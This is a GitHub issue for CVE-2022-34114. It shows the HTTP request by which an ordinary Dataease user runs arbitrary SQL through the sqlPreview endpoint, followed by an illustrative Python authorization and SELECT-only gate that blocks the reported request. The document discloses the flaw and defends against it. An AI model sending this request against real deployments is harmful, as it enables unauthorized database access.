CVE-2022-34114: [Bug] Arbitrary SQL code execution · Issue #2430 · dataease/dataease
Dataease v1.11.1 was discovered to contain a SQL injection vulnerability via the parameter dataSourceId.
Bug reproduction steps (screenshots preferred)
A user with ordinary (non-admin) privileges can call the /dataset/table/sqlPreview endpoint.
The request needs only two parameters, dataSourceId and sql (the latter carried as a JSON string inside the info field); a valid dataSourceId can be obtained by viewing the data source list.
```http
POST /dataset/table/sqlPreview HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: xxx
LINK-PWD-TOKEN: null
Content-Length: 95
Connection: close

{"dataSourceId":"76026997-94f9-4a35-96ca-151084638969","info":"{\"sql\":\"select version()\"}"}
```
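The request body above is double-encoded: the outer JSON carries `info`, which is itself a JSON string holding the `sql` the server forwards to the datasource. The snippet below is an added illustration, not Dataease code, of how a server-side gate on such a preview endpoint would decode that body and then refuse it unless the caller holds edit rights on the named datasource and the statement is a single, comment-free SELECT. The ACL (`DATASOURCE_EDITORS`), the user names and the policy rules are assumptions for the example; the body is the one shown in the report.

```python
import json
import re
from dataclasses import dataclass

# The exact request body from the report (constructed here as a Python literal).
REPORTED_BODY = (
    '{"dataSourceId":"76026997-94f9-4a35-96ca-151084638969",'
    '"info":"{\\"sql\\":\\"select version()\\"}"}'
)

# Hypothetical ACL: which users may run preview SQL against which datasource.
DATASOURCE_EDITORS = {
    "76026997-94f9-4a35-96ca-151084638969": {"admin"},
}


@dataclass
class PreviewRequest:
    data_source_id: str
    sql: str


def parse_preview_body(raw: str) -> PreviewRequest:
    """Decode the outer JSON, then the JSON string nested in `info`."""
    outer = json.loads(raw)
    info = json.loads(outer["info"])
    return PreviewRequest(data_source_id=str(outer["dataSourceId"]), sql=str(info["sql"]))


_COMMENT_RE = re.compile(r"(--|#|/\*)")
_SELECT_RE = re.compile(r"^select\b", re.IGNORECASE)


def sql_is_single_select(sql: str) -> bool:
    """Defence-in-depth only: one SELECT, no stacked statements, no comments.

    This is deliberately strict rather than a real SQL parser; the primary control
    is the authorization check plus a read-only database account for previews.
    """
    s = sql.strip().rstrip(";").strip()
    if not s or ";" in s or _COMMENT_RE.search(s):
        return False
    return bool(_SELECT_RE.match(s))


def authorize_preview(user: str, req: PreviewRequest) -> tuple[bool, str]:
    """Return (allowed, reason). Authorization is checked before the SQL shape."""
    if user not in DATASOURCE_EDITORS.get(req.data_source_id, set()):
        return False, "user lacks edit rights on this datasource"
    if not sql_is_single_select(req.sql):
        return False, "only a single SELECT statement without comments is allowed"
    return True, "ok"


def check_reported_payload(user: str) -> tuple[bool, str]:
    """Run the reported request through the gate as the given user."""
    return authorize_preview(user, parse_preview_body(REPORTED_BODY))


if __name__ == "__main__":
    # The reporter's scenario: an ordinary user sends the body and is refused.
    print("alice:", check_reported_payload("alice"))
    # The same body from a datasource editor passes both checks.
    print("admin:", check_reported_payload("admin"))
```

The ordering matters: the privilege check runs first, so an unprivileged caller is rejected before the SQL is even inspected, which is the gap the report describes. The statement allowlist is a secondary measure; dialect-specific constructs such as `SELECT ... INTO OUTFILE` on MySQL show why the preview connection itself should also be a read-only account.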